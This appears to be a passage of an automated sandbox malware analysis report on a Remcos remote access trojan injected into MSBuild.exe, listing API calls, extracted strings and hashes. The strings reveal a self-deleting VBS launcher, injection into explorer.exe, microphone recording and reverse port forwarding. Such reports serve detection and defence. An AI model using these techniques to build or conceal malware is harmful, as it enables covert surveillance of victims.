                                                                                                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                        • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                        • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                        • API String ID: 1913171305-390638927
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                        • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3658366068-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                                        • GetLastError.KERNEL32 ref: 00454A96
                                                                                                                        • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                                        • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                                        • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                                        • GetLastError.KERNEL32 ref: 00454C58
                                                                                                                        • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 65535$udp
                                                                                                                        • API String ID: 0-1267037602
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                                        • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                                        • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                                        • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                                        • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                                        • _free.LIBCMT ref: 0043946A
                                                                                                                        • _free.LIBCMT ref: 00439471
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2441525078-0
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                        • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                        • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
• HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage
• API String ID: 2956720200-749203953
• Opcode ID: 0a8cfa12567f3aee5b36ed63fcb2901dca7d6d53f6b53b69f7828746b288e178
• Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
• Opcode Fuzzy Hash: 0a8cfa12567f3aee5b36ed63fcb2901dca7d6d53f6b53b69f7828746b288e178
• Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A

APIs
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
• CloseHandle.KERNEL32(00000000), ref: 00416F2D
• DeleteFileA.KERNEL32(00000000), ref: 00416F3C
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
• String ID: <$@$@FG$@FG$Temp
• API String ID: 1107811701-2245803885
• Opcode ID: 72b6f248338ad01abce2a85042f135eebbc81b4a8627105bc11ff778a7ce6486
• Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
• Opcode Fuzzy Hash: 72b6f248338ad01abce2a85042f135eebbc81b4a8627105bc11ff778a7ce6486
• Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99

APIs
• GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
• GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406705
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CurrentProcess
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
• API String ID: 2050909247-4145329354
• Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
• Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
• Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
• Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
• Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
• Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
• Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5

APIs
• _free.LIBCMT ref: 00446DDF
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• _free.LIBCMT ref: 00446DEB
• _free.LIBCMT ref: 00446DF6
• _free.LIBCMT ref: 00446E01
• _free.LIBCMT ref: 00446E0C
• _free.LIBCMT ref: 00446E17
• _free.LIBCMT ref: 00446E22
• _free.LIBCMT ref: 00446E2D
• _free.LIBCMT ref: 00446E38
• _free.LIBCMT ref: 00446E46
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
• Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
• Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
• Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Eventinet_ntoa
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
• API String ID: 3578746661-4192532303
• Opcode ID: 3c37e0140b29215e1cc5bf095320872d24a2e6ca36ee35567f4ef7189c3101bb
• Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
• Opcode Fuzzy Hash: 3c37e0140b29215e1cc5bf095320872d24a2e6ca36ee35567f4ef7189c3101bb
• Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F

APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
• Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
• Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
• Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D

APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• Sleep.KERNEL32(00000064), ref: 00416688
• DeleteFileW.KERNEL32(00000000), ref: 004166BC
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
• API String ID: 1462127192-2001430897
• Opcode ID: 17781720042e8dd5f6383a37f316ae78f39f246e06b2fe8c00021d6916931921
• Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
• Opcode Fuzzy Hash: 17781720042e8dd5f6383a37f316ae78f39f246e06b2fe8c00021d6916931921
• Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D

APIs
• _strftime.LIBCMT ref: 00401AD3
  • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
• waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
• waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
• waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
• String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
• API String ID: 3809562944-3643129801
• Opcode ID: 6ae21cb00cef94fe011206d91043368fb3a1eea725e775b212b5f58a868d8104
• Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
• Opcode Fuzzy Hash: 6ae21cb00cef94fe011206d91043368fb3a1eea725e775b212b5f58a868d8104
• Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A

APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
• waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
• waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
• waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
• waveInStart.WINMM ref: 00401A81
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
• String ID: XCG$`=G$x=G
• API String ID: 1356121797-903574159
• Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
• Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
• Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
• Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
  • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
  • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
  • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
• lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
• Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
• TranslateMessage.USER32(?), ref: 0041C9FB
• DispatchMessageA.USER32(?), ref: 0041CA05
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                        • String ID: Remcos
                                                                                                                        • API String ID: 1970332568-165870891
                                                                                                                        • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                        • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                                        • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                        • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                                                        • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                                        • Opcode Fuzzy Hash: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                                                        • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                                                                                        • __freea.LIBCMT ref: 00452DAA
                                                                                                                        • __freea.LIBCMT ref: 00452DB6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 201697637-0
                                                                                                                        • Opcode ID: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                                                        • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                                        • Opcode Fuzzy Hash: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                                                        • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                                        • _free.LIBCMT ref: 00444714
                                                                                                                        • _free.LIBCMT ref: 0044472D
                                                                                                                        • _free.LIBCMT ref: 0044475F
                                                                                                                        • _free.LIBCMT ref: 00444768
                                                                                                                        • _free.LIBCMT ref: 00444774
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                        • String ID: C
                                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                                        • Opcode ID: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
                                                                                                                        • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                                        • Opcode Fuzzy Hash: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
                                                                                                                        • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: tcp$udp
                                                                                                                        • API String ID: 0-3725065008
                                                                                                                        • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                        • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                                        • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                        • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                        APIs
                                                                                                                        • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                          • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                          • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                          • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                          • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                          • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                        • String ID: T=G$p[G$>G$>G
                                                                                                                        • API String ID: 1596592924-2461731529
                                                                                                                        • Opcode ID: 0bcdf1af44f42523717d6e0888b3946a9b799004678d95474f77185bdb4abe82
